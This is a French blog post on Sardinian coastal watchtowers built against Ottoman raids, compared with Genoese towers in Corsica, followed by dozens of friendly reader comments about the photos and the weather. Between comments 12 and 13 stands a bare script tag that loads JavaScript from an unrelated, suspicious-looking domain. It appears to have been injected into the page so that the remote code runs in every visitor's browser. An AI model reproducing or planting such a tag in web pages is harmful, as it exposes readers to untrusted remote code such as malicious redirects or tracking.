• Tour des Tours........

    Tour des Tours........

    Quand on visite la Sardaigne en longeant les côtes on aperçoit obligatoirement des tours sur le littoral.

    Le même phénomène est visible en Corse. Cependant elles ne sont pas identiques dans leur conception.En Corse  sous domination Gênoise, elles ont été construites suivant le même modèle , et conçues pour être habitées par deux à six hommes qui devaient respecter un cahier des charges très prècis.

    Tour des Tours........

     

    Tour des Tours........

     En Sardaigne, dans les années 1300- 1700 la Méditerranée est le théatre des affrontements entre les Chrétiens et les Ottomans , entre la croix et le croissant.

    Tour des Tours........

    Tour des Tours........

     

    la Sardaigne était sous domination Aragonaise puis Epagnole ,plus précisemment Catalane.Les tours sont massives, rondes et enduites de chaux.

    Dans la région d'Alghéro elles sont nombreuses y compris en ville car la citée était fortifiée, comme je vous l'ai indiqué dans mon article précédent.

    On voit aussi des tours de l'époque médiévale dans l'intérieur de l'île, mais cela est une autre histoire.....

    Tour des Tours........

    Je vous offre donc ces quelques images prises lors de mon dernier séjour.

     

    Je vous souhaite une très bonne semaine.

    « Remparts......Su Nuraxi... »

  • Commentaires

    1
    Dimanche 3 Novembre 2019 à 11:09

    Bonjour Baba . De tout temps et tristement , les homme  ont construit  des sites de défenses contres leurs semblables et surtout leurs religions respectives étaient la causes de tout ces malheurs . De nos jours , les tours ont disparues mais les même discordes existent encore bel et bien . Merci de ce reportage et partage mon ami et bon dimanche .

    2
    Dimanche 3 Novembre 2019 à 11:41

    Merci de nous permettre de visiter cette région, nous en profitons autant que toi...

    Bon dimanche!

    Bises de Mireille du sablon

    3
    Dimanche 3 Novembre 2019 à 11:44

    Pas de tour Vauban en Sardaigne Baba lol lol ,mais toujours des tours pour se défendre de l'ennemi.

    Merci pour tes explications et clichés topissimes Baba, j'ai bien aimé ton partage .

    Ici du vent, du vent, du vent , soleil, tempête Amélie brrr

    un peu peur pour le littoral, mer déchaînée et et j'espère surtout pas de pertes humaines ..

    Bon dimanche,

    Bises amicales de Christiane

    4
    Dimanche 3 Novembre 2019 à 13:01

    Salut

    L'Islam a toujours été arrêté car les souverains de l"époque n'en voulait pas .

    Je me paye une chiatique du tonnerre alors je passe en vitesse.

    Heureusement il y a la Tiotte qui me soigne.

    J'espère que la pluie ne fait pas de dégâts.

    Bonne semaine

     

    5
    Dimanche 3 Novembre 2019 à 13:52

    Affrontements entre la croix et le croissant... comme quoi ça ne date pas d'aujourd'hui !.....

    Jusqu'à 6 mecs qui cohabitaient dans la tour ? ça devait un peu sentir le fauve....yes

    Bon dimanche

    6
    Dimanche 3 Novembre 2019 à 15:58

    Superbes vestiges

    Bises

    7
    Dimanche 3 Novembre 2019 à 16:08

    Bonjour Baba, j'ai aimé faire le tour des tours, elles sont superbes  et ont du en voir…au fil du temps..

    Bonne fin de journée gros bisous

    8
    Dimanche 3 Novembre 2019 à 16:18

    je raffole de ces tours, Baba!

    Souvenirs anciens heureusement conservés!

    Agnès vient de rentrer de l'hôpital, je vais être très prise!

    Bises cher Baba

    Gigu

    9
    Dimanche 3 Novembre 2019 à 18:57

    Et maintenant nous attendons la nouvelle histoire des tours, JL

    10
    Dimanche 3 Novembre 2019 à 19:34

    bonsoir 

     j ai toujpurs trouvé superbes ces tours Génoises 

     ce sont des vestiges qui auraient beaucoup à nous raconter 

     bonne soirée Baba 

     ( la tempête est calmée  chez nous  mais cette nuit 

    les pluies étaient  trés fortes )

     kénavo

    11
    Dimanche 3 Novembre 2019 à 19:43

    Bonsoir Baba

    Certaines ont souffert, mais il reste quand même de beaux vestiges

    Je te souhaite une bonne soirée, bisous

    12
    Dimanche 3 Novembre 2019 à 21:40

    Salut Baba,

    Effectivement, c'est comme en Corse.

    Tes photos sont belles.

    Bonne soirée.

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    13
    Dimanche 3 Novembre 2019 à 23:15

    Coucou Baba,

    eh oui de tout temps les hommes n'ont pensé qu'à se lancer dans des guerres pour prendre ce qui ne appartient aux voisins.

    Enfin il en reste des tours qui ne sont pas toutes en ruine.

    Amitié et douce nuit.

    14
    Lundi 4 Novembre 2019 à 00:25

    un endroit qui vaut le ...détour !!!

    bonne semaine.

    15
    Lundi 4 Novembre 2019 à 00:43

    Bonjour baba

    belle série de tour

     

    Commence bien cette nouvelle semaine

     

    Avec amitiés

     

    René

     

    16
    Lundi 4 Novembre 2019 à 08:00

    Je retrouve avec plaisir tes superbes photos et les explications très intéressantes.

    Merci pour ce partage instructif.

    " Bon début de semaine toujours bien gris après le passage d'amélie qui n'a pas fait de trop gros dégâts.
    Je reprends un peu mes visites mais elles ne seront certainement pas quotidiennes,
    ce sera selon si je suis bien ou pas.
    Gros bisoux ♥ "

    17
    Lundi 4 Novembre 2019 à 08:15

    Bonjour
    C'est une publication que j'aime beaucoup  et bien documentée
    Merci de ces belles images et beau lundi

    18
    Lundi 4 Novembre 2019 à 09:34

    La création du jour

    Bonjour Baba,

    merci pour ces photos nous montrons les tours en Sardaigne..

    Lorsque nous avions fait le tour de la Corse avec mon mari, nous avions vu les tours gênoises...

    Le soleil est de retour ce  matin, espérons qu'il va rester...

    Bonne journée, bons baisers

    19
    Lundi 4 Novembre 2019 à 09:37

    merci Baba , eh bien je viens d'apprendre ce qui s'est passé en Sardaigne  !

    et ces tours ont du vécu !! j'aime  ! et les construire sur des rochers !! ils étaient fort ...

    merci pour tes photos  et c'est à voir un jour !  

    bonne semaine a +

    20
    Lundi 4 Novembre 2019 à 10:00

    Bonjour Baba

    Il a fallu défendre le littoral des envahisseurs quelle que soit leur origine mais au système de défense sarde celui en place en Corse me paraît plus harmonieux si tant est qu'on puisse parler d'harmonie pour des ouvrages militaires LOL !

    Amitiés

    21
    Lundi 4 Novembre 2019 à 11:26

    bonjour baba

    magnifiques vestiges mais beaucoup de souffrances autour de leur histoire

    amitié et belle journée à toi

    22
    Lundi 4 Novembre 2019 à 11:29

    une bonne leçon d'histoire sur les dites tours de Sardaigne et Corse, que je ne savais pas bien sûr. le tout auréolé de belles photos dans un paysage superbement bien entretenu qui donne encore plus de cachet  à ces vieux souvenirs . très agréable lecture et vision dans ton article, merci.

    23
    Lundi 4 Novembre 2019 à 11:36

    C'est encore la guerre qui nous donne de jolis batiments

    Passe une bonne semaine

    24
    Lundi 4 Novembre 2019 à 12:43

    Bonjour Baba

    Des photos superbes et des explications très intéressantes !

    Excellent partage comme toujours , merci

    Je te souhaite une très bonne journée

    Bise

    25
    Lundi 4 Novembre 2019 à 13:29

    Bonjour Baba

    Elle est magnifique cette tour, moi l'amoureuse des pierres je suis sous le charme mais je préfère admirer tes magnifiques clichés que d'y grimper car avec mon vertige je ne pourrais pas apprécier la belle vue qu'on a d'en haut, avec ce beau ciel et ce beau paysage cela doit être un plaisir de visiter la Sardaigne.

    J'espère que chez toi le soleil brille et que les intempéries vues à la télé n'ont pas fait de dégât chez toi. Chez moi ce matin nous avions du soleil puis une belle averse est arrivée et elle a fait du bien à mon jardin et cet AM les nuages s'amusent avec le soleil.

    Bel après-midi.

    Bisous d'amitié de mon ti rocher.

    26
    Lundi 4 Novembre 2019 à 15:10

    merci pour ce beau reportage et info pour le champignon. BOn lundi 

    27
    Lundi 4 Novembre 2019 à 15:27

    Bonjour Baba, très intéressant ton article sur les tours, il faut que malgré leurs ages,  elles sont magnifiques! bonne semaine à toi et Mme Baba. gros bisous

    28
    Lundi 4 Novembre 2019 à 16:16

    Voila de magnifiques photos de tours : un régal pour mes yeux !

    Ici à Toulouse il pleut, je te souhaite de passer une bonne soirée .

    Cordiales amitiés & à + yes

    29
    Lundi 4 Novembre 2019 à 17:10

    Salut,

    La plupart des tours ne servent à rien c'est dommage.

    Le temps est variable .

    On a essuyé une averse tout à l'heure alors qu'on était en courses.

    Mais on garde le moral.

    Bonne semaine

    30
    Lundi 4 Novembre 2019 à 19:51

    Le Tour des Tours... Bien ficelé ! Quand viens-tu faire le Tour des "Tourmalines" ???

    Bonne soirée, Baba,

     

    31
    Lundi 4 Novembre 2019 à 20:29

    Elles me paraissent plus massives que leurs cousines corses

    JP

    32
    Lundi 4 Novembre 2019 à 21:24

    bonsoir merci pour ces jolies images  , j'espère que tu as passé un bon wk-end , le mien ,passé avec le fiston et sa femme , comme il pleuvait , ils sont passés boire le café , du coup , ils ont restés pour le soir et l'après-midi nous avons joué aux cartes ,bonne soirée , bisous

    33
    Mardi 5 Novembre 2019 à 00:30
    Bonjour passage rapide direction le dentiste bonne journee Rene
    34
    Mardi 5 Novembre 2019 à 08:27

    Elles sont aussi belles que les nôtres  ces tours.

    Sur ma commune, il y a une des rares tours génoises, qui se trouvent à l'intérieur des terres :je la vois de ma terrasse tous les jours .

    Le soleil fait une timide apparition ce matin avec de la pluie quand même .Bonne journée

     

    35
    Mardi 5 Novembre 2019 à 10:31

    Bonne journée à toi Baba

    Bise et à jeudi 

    36
    Mardi 5 Novembre 2019 à 10:44

    La création du jour

    Bonjour Baba,

    le beau temps est revenu avec du vent et 15°...

    Bonne journée, gros bisous

    37
    Mardi 5 Novembre 2019 à 14:02

    ah c'est beau j'adore ...

    bon je suis sur le vieil ordi de kevin qui fonctionne moyen maman fait la sieste dans la salle à manger

    l'électricité est terminée mais mon pauvre faut voir comment c'est fait , heureusement que kevin s'y connait il pourra rectifier leurs conneries.. néont de la salle de bain au dessus du lavabo à 1M70 , tu mets la glace en dessous, et tu te baisses pour te voir. aucune jugeotte.. par contre l'éclairage des toilettes la lampe tout en haut près du plafond,, au lieu de mettre au dessus de la porte, impossible de changer la lampe, j'ai pas des bras d'un mètre !!! ni escabeau juste un tabouret.. ah bon ..

    pas aidé.. et m'ont fait une fuite, disent que c'est pas eux, mon oeil.. j'ai tel au gardien, qui est monté et a confirmer que c'etait eux.. comme je suis une femme ils ont du se dire elle y connait rien ben manque de bol je savais que c'etait à cause de la plinthe que le robinet fuyait, ont forcé pour faire rentrer la plinthe et paf.. bon on a fermé le robinet d'eau et lesplombiers vont tout changer quand ils referont la partie plomberie.. drôles de gus.. plombier comme moi suis président de la république ..

    et pas beaux ceux là en plus ! mdrrrr

    allez un bisou baba et une bonne semaine, petit peu soleil aujourd'hui bibi flo

    38
    Mardi 5 Novembre 2019 à 15:53

    Salut

    Le temps est variable mais on peut se balader car il ne fait pas froid.

    Bonne journée

    39
    Mardi 5 Novembre 2019 à 17:54

    Bonjour Baba , je suis toujours heureuse de découvrir tes photos, il va vraiment falloir que je visite entièrement cette île un jour, mais il me semble que je préfèrerais toujours la Corse. A chaque fois qu'on a voulu faire la Sardaigne il y avait trop de vent pour la navigation avec notre bateau. Je te souhaite une bonne semaine, bisous

    40
    Mardi 5 Novembre 2019 à 20:36

    Merci pour toutes ces explications.....

    Biz. Aline

    41
    Mercredi 6 Novembre 2019 à 00:00

    Quelle jolie promenade chargée d'histoire . Tu dois te régaler!

    Bon mercredi Baba

    42
    Mercredi 6 Novembre 2019 à 00:58
    Bonjour baba Déjà la moitié de la semaine Passe une très bonne journée Avec amitiés René
    43
    Mercredi 6 Novembre 2019 à 08:10

    Que c'est magnifique! J'adore imaginer la vie autrefois, du temps de ces tours, ou des tours médiévales. Parfois j'aimerais avoir le don de remonter le temps (mais de rester invisible parce je ne voudrais pas me prendre un coup d'épée, de flèche ou être brûler pour sorcellerie! lol!)

    44
    Mercredi 6 Novembre 2019 à 10:22

    La création du jour

    Bonjour BABA,

    le temps se rafraîchit, plus que 11° ce matin.

    Bonne journée, bons baisers

    45
    Mercredi 6 Novembre 2019 à 11:19
    francinea

    Bonjour, tu n'es pas dépaysé, même si, comme tu le dis, elles ne se ressemblent pas; les deux personnes sur la première n'ont pas le vertige, mais l'endroit est peut-être moins escarpé qu'il n'y paraît, je te souhaite une bonne journée, bisous

    46
    Mercredi 6 Novembre 2019 à 21:44

    bonsoir  , c'est bien joli , j'adore ,  du côté météo , c'était de la pluie toute la

    47
    Jeudi 7 Novembre 2019 à 22:30

    Bien conservées et ou retapées...

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :